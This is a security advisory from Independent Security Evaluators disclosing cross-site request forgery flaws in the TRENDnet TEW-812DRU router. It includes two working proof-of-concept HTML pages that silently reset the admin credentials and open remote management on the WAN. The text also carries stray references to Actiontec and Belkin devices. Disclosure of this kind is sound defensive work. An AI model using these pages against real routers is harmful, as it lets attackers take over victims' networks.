Taking over the TRENDnet TEW-812DRU

[return to summary]

  • The TEW-812DRU can be taken over by a remote adversary through CSRF attack.

Description

The TRENDnet TEW-812DRU router is susceptible to several CSRF attacks, which allow an attacker to forge HTML forms and execute actions on behalf of a legitimate user. ISE created a proof of concept that when executed by an unsuspecting device administrator, changes the administrator credentials and enables remote web management services.

Attack Requirements

  • The victim must have an active management session with the Actiontec router.
  • The victim must be fooled in to performing an action (e.g., by clicking an attacker provided link), browse to a malicious or compromised site, or be the victim of a man-in-the-middle attack.

Details

All HTML forms present in the TRENDnet TEW-812DRU are susceptible to Cross-Site Request Forgery.

  • Vulnerable Firmware is 1.0.8.0.
  • Other versions of firmware were not tested.

Impact

A successful attack exploiting this vulnerability can give a remote adversary full control over the victim router.

Recommendations to the vendor

  • Cross-Site request forgery can be prevented by including an unpredictable token in each HTTP request submitted to the web server. At a minimum, these tokens should be unique to each user, but it is recommended that each HTML form delivered contain a unique token.
  • In addition to HTML form tokens, HTTP refferer checking should be enabled.
  • Additional information for vendors regarding immediate and long term fixes for these issues can be found on our summary page here.

Recommendations to device administrators

  • (4/13/2013) There is not currently an available firmware upgrade that will remedy this vulnerability.
  • Take additional preventative measures and precautions by following the steps outlined on our summary page here.

Proof of Concept

In the following proof of concept attack, we assume that a device administrator with an active management session established with the router has browsed to a malicious web page. Once there, a series of automatic form submissions take place, one after the other, to the administrator's router, from the administrator's browser. Since the administrator has a current session established with the router, the form submissions are processed.

The first form (Figure 1) is pre-filled out with the information required to change the administrative credentials required to configure the router. The form is automatically submitted, and the victim's browser is then redirected to a second page.


<html>

<head>
<title> TRENDnet TEW-812DRU CSRF - Change Admin Credentials.</title>
<!--*Discovered by: Jacob Holcomb 
	- Security Analyst @ Independent Security Evaluators -->
</head>

<body>

<form name="trendCSRF" action="http://192.168.10.1/setSysAdm.cgi" method="post"/>
<input type="hidden" name="page" value="/adm/management.asp"/>
<input type="hidden" name="admuser" value="admin"/>
<input type="hidden" name="admpass" value="ISE"/>
<input type="hidden" name="AuthTimeout" value="600"/>
</form>

<script>
function tnetCSRF1() {document.trendCSRF.submit();}; 
window.setTimeout(tnetCSRF1, 0000);
function tnetCSRF2() {window.open("http://192.168.0.100/CSRF2.html");};
window.setTimeout(tnetCSRF2, 0000)
</script>

<body>
</html>

Figure 1. Attack page 1.

This second page (Figure 2) is pre-filled with the information required to enable remote management. Again, the form is automatically submitted on behalf of the victim.


<html>

<head>
<title> TRENDnet TEW-812DRU CSRF - Enable Remote Management.</title>
<!--*Discovered by: Jacob Holcomb 
	- Security Analyst @ Independent Security Evaluators -->
</head>

<body>

<form name="trendCSRF" action="http://192.168.10.1/uapply.cgi" method="post"/>
<input type="hidden" name="page" value="/adm/management.asp"/>
<input type="hidden" name="remote_en" value="1"/>
<input type="hidden" name="http_wanport" value="31337"/>
<input type="hidden" name="action" value="Apply"/>
<input type="hidden" name="apply_do" value="setRemoteManagement"/>
</form> 

<script>
function tnetCSRF1() {document.trendCSRF.submit();};
window.setTimeout(tnetCSRF1, 0000);
</script>

<body>
</html>

Figure 2. Attack page 2.

At this point, the attacker can remotely administer, and thereby remotely control the router.

References

  • None.

Credit

  • Discovered By: Jacob Holcomb – Security Analyst @ Independent Security Evaluators
  • Exploited By: Jacob Holcomb – Security Analyst @ Independent Security Evaluators

Contact Information

  • For more information on this particular Belkin hack, you can contact us at routers@www.ise.io
  • Alternatively, for more general information on ISE, you can reach us using contact@www.ise.io